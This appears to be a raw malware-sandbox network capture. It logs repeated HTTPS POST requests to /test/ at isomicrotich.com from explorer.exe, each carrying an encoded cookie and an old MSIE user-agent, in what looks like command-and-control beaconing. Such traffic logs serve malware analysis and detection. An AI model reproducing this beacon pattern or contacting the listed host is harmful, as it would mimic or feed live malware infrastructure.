                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19564ab8423e-EWR
2024-10-03 18:47:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 62321 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:10 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:11 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9f60N3zcWhnIUCoUprNpQKvU65tKImF5I%2FTZNHQcxcLPvejLmcQHoeO7JbGddrjOAzfmlRqkhuIUVzoFNpjAh9KIwy%2FwbRDddg0PGImQrWpRfAtcn%2F9xWr%2FToC3Z4yhK%2B1jV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19693cac8c11-EWR
2024-10-03 18:47:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 62323 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:12 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:13 UTC | 571 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT%2BWdnLvAlGl5y7cQR%2Bw6V9OlVeoFbAO1uP9jL19rojGG33odGjivKblAWD9%2BXrQXlA6toFlHFHW6L9%2BDPN3T2fAWORANrxSvSwaw8%2BnlSdkckQoCzRHgnG3NmSIz2LNF66%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19700bf2de96-EWR
2024-10-03 18:47:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 62326 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:13 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:14 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VKgDQigfEtDNo2Cotaa1zISGHgUyQCXLEFbd%2F2e2pIl4plaqv2HwPIniDw62PJxtTsFCRZeG6Z%2FAR5VhH0F%2BTjmhCuSqnhrDz6mVWjsv2pAwwuUcGnVAndBFGW6R9s1LFekf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf197759487d26-EWR
2024-10-03 18:47:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 62329 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:15 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:15 UTC | 571 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klo2TpBf39Ygs90u5hztw%2F4ws6LNrCwIw8fs%2FYr7vYkG7LRzHWA3ysmWaD%2F4M36RrGojNFuY3g%2BC2rwZ4MhK4bBhO81OLjZNvAPq4nYTR%2FeX%2F8CvBxgOF5JckjTSXJkt7Ulb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19823d8b728f-EWR
2024-10-03 18:47:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 62331 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:16 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:16 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:16 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QgVuQ4rPt6Cfctan3gf0TK02RCNIkfmZ%2Fj2DTSHKDk9MXNno2qk3JMqWn05fZ5iaIZ4hVl%2F6lkbIcvUqJlfoJ4UyeIy0S5SDQ0bRL0Uqx9CYJ3Lhb0Vu3n49SmycsyUZDzF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1988db8cde92-EWR
2024-10-03 18:47:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 62332 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:17 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:18 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dZmvih%2BzuV7JILnT3OyyrOZOIgB5vdUT6Rt3bGLjuK%2BPL%2Fd2EyjfFYkKI2oDG%2Bc38iyQTSfoSvnX5f3ZEiHCCxRoMsy5cVoQuBZnAs6oQlho07PN7ZBl0spZLYI4g9gMGZH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19920c7219f3-EWR
2024-10-03 18:47:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 62334 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:19 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:19 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:19 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9rvt%2BPFVVcEGvdGNgBb0Q8DgGJE1BXbnmMDFY%2B5fZQkIYnQu0qFEwTGN0jOvqrwfYypltTkWmh3OoNMTdRtvxO5cT3eHufH%2BvhdZFcyovW4q7ymfyTe6VZbhe8eqwPBX5Jl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1998af7241f9-EWR
2024-10-03 18:47:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 62337 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:20 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:20 UTC | 550 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FB%2BLHx%2BUqiApk2xapi7XL%2FclsnPdiMpVSx6m1O0MDtOu%2FGR9f8iXN4rFRkWoQ83iIZ7ot6oreZkU8P19HP51HP%2BhP54J31YapkMwdblWhqYK2R9fP0%2Fz9iwaCEzQtICPCyxC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19a058d87c9c-EWR
2024-10-03 18:47:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 62338 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:21 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:21 UTC  540  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAfjzZM4pU9MrP10FZFBkDm9c7x9ua6DEm7TZyQ98RuY6hwnm2tpKwnjFlRNR9D64X7wuKk5sWFULFlFheciPUl%2BFfAINm5rEAdPPYsN8nTzGZR6932BbvLrqC7aF1MmIl3U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19a70b995e79-EWR
2024-10-03 18:47:21 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.7  62339        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:22 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:23 UTC  542  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2guMOOde7PqxLMOLmnLW9hkJjIS4UBER1sGSbbuRk75KI%2FDuoNLcUz6ywceMyM4SLyUDPnINq1%2BmV38TsCNJ9WvHu%2BeqTPltnOkVaRE7w2TeOGFPEYJ3oTO8oTEb10fbP6e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19afdde619ef-EWR
2024-10-03 18:47:23 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.7  62340        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:23 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:24 UTC  538  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vD9CCGjLNGgQt231UdBffg8EhFwoyE8CitpV6z4pQfBGtCeC64pP4Q6ihsvc9sxgBOKzT1JPsiEG4vl%2FnNAZSwMNaxbA0cl7njw5Qbwj6cw4gsZJCnKFd6EkvaYoW9AJit9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19b67a3841e7-EWR
2024-10-03 18:47:24 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.7  62341        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:24 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:25 UTC  542  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ku9Se3rwKWiKZ4z4Ptp3W8bXMOyMBDx1rXOkdb6W8F6J42202DMZilH71%2F90TDFnkEZgj0TkhPRZ8o%2B7PImZ7LxrpT41yJzujBVW5K%2B6rHq5pmAysHNOkHWMgNamsm50tqpQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19be7b4243b6-EWR
2024-10-03 18:47:25 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.7  62344        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:26 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:26 UTC  597  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mtoRFhUIUrUTwIsZfdTSjz935pvt0M%2BRRvAeXwdm%2FC2FTH41fcnH1HKbpz3Cy7xkTMi19zF37laispL%2F998VBOFqtZ9i7rImYJxx478BJ%2FM23HR9YRjWmO41TDvslK5gPr63"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19c5c8544325-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-10-03 18:47:26 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
